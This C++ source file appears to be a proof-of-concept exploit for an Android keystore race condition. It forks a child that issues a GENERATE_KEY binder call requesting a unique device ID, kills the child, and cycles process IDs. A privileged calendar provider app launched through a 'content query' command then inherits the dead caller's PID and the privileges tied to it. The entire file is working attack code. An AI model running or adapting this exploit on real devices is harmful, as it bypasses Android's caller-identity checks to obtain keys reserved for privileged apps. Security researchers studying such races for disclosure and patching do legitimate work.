#define LOG_TAG "KeyStoreRace"
#include <android-base/logging.h>
#include <set>
#include <string>
#include <iostream>
#include <string>
#include <android-base/macros.h>
#include <utils/StrongPointer.h>
#include <binder/Parcel.h>
#include <binder/ProcessState.h>
#include <binder/IServiceManager.h>
#include <android/log.h>

#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <err.h> 
#include <errno.h>
#include <sys/mman.h>

#include "types.h"

using namespace android;
using namespace android::hardware;
using namespace android::hardware::keymaster::V3_0;

extern char ** environ;

#define IDLE (0)
#define SEND_COMMAND (1)
#define SENT_COMMAND (2)

volatile int* g_state = IDLE;

#define GENERATE_KEY (24)

constexpr TagType typeFromTag(Tag tag) {
	return static_cast<TagType>(static_cast<uint32_t>(tag) & static_cast<uint32_t>(0xf0000000));
}

status_t writeKeymasterBlob(const hidl_vec<uint8_t>& blob, Parcel* out) {
    int32_t size = int32_t(std::min<size_t>(blob.size(), std::numeric_limits<int32_t>::max()));

    auto rc = out->writeInt32(size);
    if (rc != android::OK) return rc;

    if (!size) return android::OK;
    return out->write(&blob[0], size);
}

status_t writeKeyParameterToParcel(const KeyParameter& param, Parcel* out) {
    auto tag = param.tag;
    auto rc = out->writeInt32(uint32_t(tag));
    if (rc != android::OK) return rc;
    switch (typeFromTag(param.tag)) {
    case TagType::ENUM:
    case TagType::ENUM_REP:
    case TagType::UINT:
    case TagType::UINT_REP:
        rc = out->writeInt32(param.f.integer);
        break;
    case TagType::ULONG:
    case TagType::ULONG_REP:
    case TagType::DATE:
        rc = out->writeInt64(param.f.longInteger);
        break;
    case TagType::BOOL:
        // nothing to do here presence indicates true
        break;
    case TagType::BIGNUM:
    case TagType::BYTES:
        rc = writeKeymasterBlob(param.blob, out);
        break;
    default:
        ALOGE("Failed to write KeyParameter: Unsupported tag %d", param.tag);
        rc = android::BAD_VALUE;
        break;
    }
    return rc;
}

status_t writeParamSetToParcel(const hidl_vec<KeyParameter>& params, Parcel* out) {

    int32_t size = int32_t(std::min<size_t>(params.size(), std::numeric_limits<int32_t>::max()));

    auto rc = out->writeInt32(size);
    if (rc != android::OK) return rc;
    for (int32_t i = 0; i < size; ++i) {
        rc = out->writeInt32(1);
        if (rc != android::OK) return rc;
        rc = writeKeyParameterToParcel(params[i], out);
        if (rc != android::OK) return rc;
    }
    return rc;
}

status_t writeBlobAsByteArray(const hidl_vec<uint8_t>& blob, Parcel* out) {
    int32_t size =
        int32_t(std::min<size_t>(blob.size(), std::numeric_limits<int32_t>::max()));

    auto rc = out->writeInt32(size);
    if (rc != android::OK) return rc;

    if (!size) return android::OK;

    return out->write(&blob[0], size);
}

int generate_key(sp<IBinder> keyStoreService,
				 const String16& name,
				 hidl_vec<KeyParameter>& params,
				 hidl_vec<uint8_t>& entropy,
				 int uid,
				 int flags) {

    android::Parcel data, reply;
    data.writeInterfaceToken(String16("android.security.IKeystoreService"));
	data.writeString16(name);
	data.writeInt32(1); //param set included!
	writeParamSetToParcel(params, &data);
	writeBlobAsByteArray(entropy, &data);
	data.writeInt32(uid);
	data.writeInt32(flags);
	*g_state = SENT_COMMAND; //A little racy, but should work
    keyStoreService->transact(GENERATE_KEY, data, &reply);
    return reply.readInt32();
}

int cycle_to_pid(pid_t pid) {

    pid_t child_pid = -1;
    while (child_pid != pid) {
        child_pid = fork();
        if (child_pid < 0) {
            perror("Failed to fork");
            return -errno;
        }
        if (child_pid == 0) {
            //In child -- exit
            _exit(0);
        }
        else {
            //In parent
            int status;
            waitpid(child_pid, &status, 0);
        }
    }
    return 0;
}

int child_flow() {

	while ((*g_state) != SEND_COMMAND);

	//Retrieving the service
	sp<android::IServiceManager> sm = defaultServiceManager();
    sp<android::IBinder> keyStoreService = sm->checkService(android::String16("android.security.keystore"));
	printf("keystore service: %p\n", keyStoreService.get());

	String16 name("name");
	KeyParameter include_unique_id_param;
	memset(&include_unique_id_param, 0, sizeof(include_unique_id_param));
	include_unique_id_param.tag = Tag::INCLUDE_UNIQUE_ID;
	hidl_vec<KeyParameter> params;
	params.resize(1);
	params[0] = include_unique_id_param;
	hidl_vec<uint8_t> entropy;
	entropy.resize(1);
	entropy[0] = 0xAB;
	int uid = getuid();
	int flags = 0;
	int res = generate_key(keyStoreService, name, params, entropy, uid, flags);
	printf("res: %d\n", res);

	return 0;
}

int parent_flow(int child_pid) {


	printf("parent pid: %d\n", getpid());
	
	//Cycling until pid-11
	//This is a hack(!), since on average the "content" call spawns 10 new pids
	//before the target application. This isn't very stable, but it's just a PoC.
	printf("cycle to pid...\n");
	cycle_to_pid(getpid()-11);

	//Indicating that the command should be sent by the child
	*g_state = SEND_COMMAND;

	//Busy loop until the child issues the transaction
	while ((*g_state) != SENT_COMMAND);

	//Killing the child
	int status;
	printf("kill: %d\n", kill(child_pid, 9));
	printf("waitpid: %d\n", waitpid(child_pid, &status, 0));
	
	//Querying the calendar provider
	//This will start the com.android.providers.calendar privapp
	//which has the priv_app SELinux context, and is therefore able
	//to produce hardware-specific keys
	system("content query --uri content://com.android.calendar/calendar_entities");
	sleep(3); //letting the query complete

	return 0;
}

int main() {

	g_state = (volatile int*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, 0, 0);
	
	pid_t pid = fork();
	if (pid < 0) {
		perror("Failed to fork");
		return -errno;
	}
	if (pid == 0)
		return child_flow();
	else
		return parent_flow(pid);
}
